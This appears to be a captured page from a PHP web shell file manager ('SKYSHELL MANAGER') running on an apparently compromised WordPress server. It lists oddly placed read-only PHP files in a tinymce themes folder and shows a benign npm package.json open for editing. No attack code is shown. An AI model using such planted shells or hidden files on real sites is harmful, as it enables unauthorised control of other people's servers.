📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "into-stream@^6.0.0", "_id": "into-stream@6.0.0", "_inBundle": false, "_integrity": "sha512-XHbaOAvP+uFKUFsOgoNPRjLkwB+I22JFPFe5OjTkQ0nwgj6+pSjb4NmB6VMxaPshLiOf+zcpOCBQuLwC1KHhZA==", "_location": "/@budibase/cli/into-stream", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "into-stream@^6.0.0", "name": "into-stream", "escapedName": "into-stream", "rawSpec": "^6.0.0", "saveSpec": null, "fetchSpec": "^6.0.0" }, "_requiredBy": [ "/@budibase/cli/pkg" ], "_resolved": "https://registry.npmjs.org/into-stream/-/into-stream-6.0.0.tgz", "_shasum": "4bfc1244c0128224e18b8870e85b2de8e66c6702", "_spec": "into-stream@^6.0.0", "_where": "/usr/local/lib/node_modules/@budibase/cli/node_modules/pkg", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "https://sindresorhus.com" }, "bugs": { "url": "https://github.com/sindresorhus/into-stream/issues" }, "bundleDependencies": false, "dependencies": { "from2": "^2.3.0", "p-is-promise": "^3.0.0" }, "deprecated": false, "description": "Convert a string/promise/array/iterable/asynciterable/buffer/typedarray/arraybuffer/object into a stream", "devDependencies": { "ava": "^2.4.0", "get-stream": "^6.0.0", "p-event": "^4.2.0", "p-immediate": "^3.1.0", "tsd": "^0.13.1", "xo": "^0.33.0" }, "engines": { "node": ">=10" }, "files": [ "index.js", "index.d.ts" ], "funding": "https://github.com/sponsors/sindresorhus", "homepage": "https://github.com/sindresorhus/into-stream#readme", "keywords": [ "stream", "buffer", "string", "object", "array", "iterable", "async", "asynciterable", "promise", "promises", "from", "into", "to", "transform", "convert", "readable", "pull", "gulpfriendly", "value" ], "license": "MIT", "name": "into-stream", "repository": { "type": "git", "url": "git+https://github.com/sindresorhus/into-stream.git" }, "scripts": { "test": "xo && ava && tsd" }, "version": "6.0.0" }
Save